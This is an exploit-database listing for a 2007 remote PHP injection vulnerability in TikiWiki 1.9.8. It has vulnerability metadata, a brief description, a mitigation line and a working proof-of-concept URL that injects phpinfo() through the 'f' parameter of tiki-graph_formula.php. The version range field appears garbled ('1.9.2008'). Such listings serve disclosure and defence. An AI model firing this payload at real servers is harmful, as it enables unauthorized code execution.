header-logo
Suggest Exploit
vendor:
TikiWiki
by:
milw0rm.com
7.5
CVSS
HIGH
Remote PHP Injection
94
CWE
Product Name: TikiWiki
Affected Version From: 1.9.2008
Affected Version To: 1.9.2008
Patch Exists: NO
Related CWE:
CPE: a:tikiwiki:tikiwiki:1.9.8
Metasploit:
Other Scripts:
Platforms Tested:
2007

TikiWiki 1.9.8 Remote PHP Injection Vulnerability

This exploit allows an attacker to inject and execute arbitrary PHP code remotely in TikiWiki version 1.9.8. By manipulating the 'f' parameter in the URL, an attacker can execute PHP code of their choice.

Mitigation:

Upgrade to a patched version of TikiWiki or apply a security patch provided by the vendor.
Source

Exploit-DB raw data:

TikiWiki 1.9.8 Remote PHP Injection Vulnerability

Example: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

# milw0rm.com [2007-10-10]

Navigation

Suggest Exploit

Services By CQR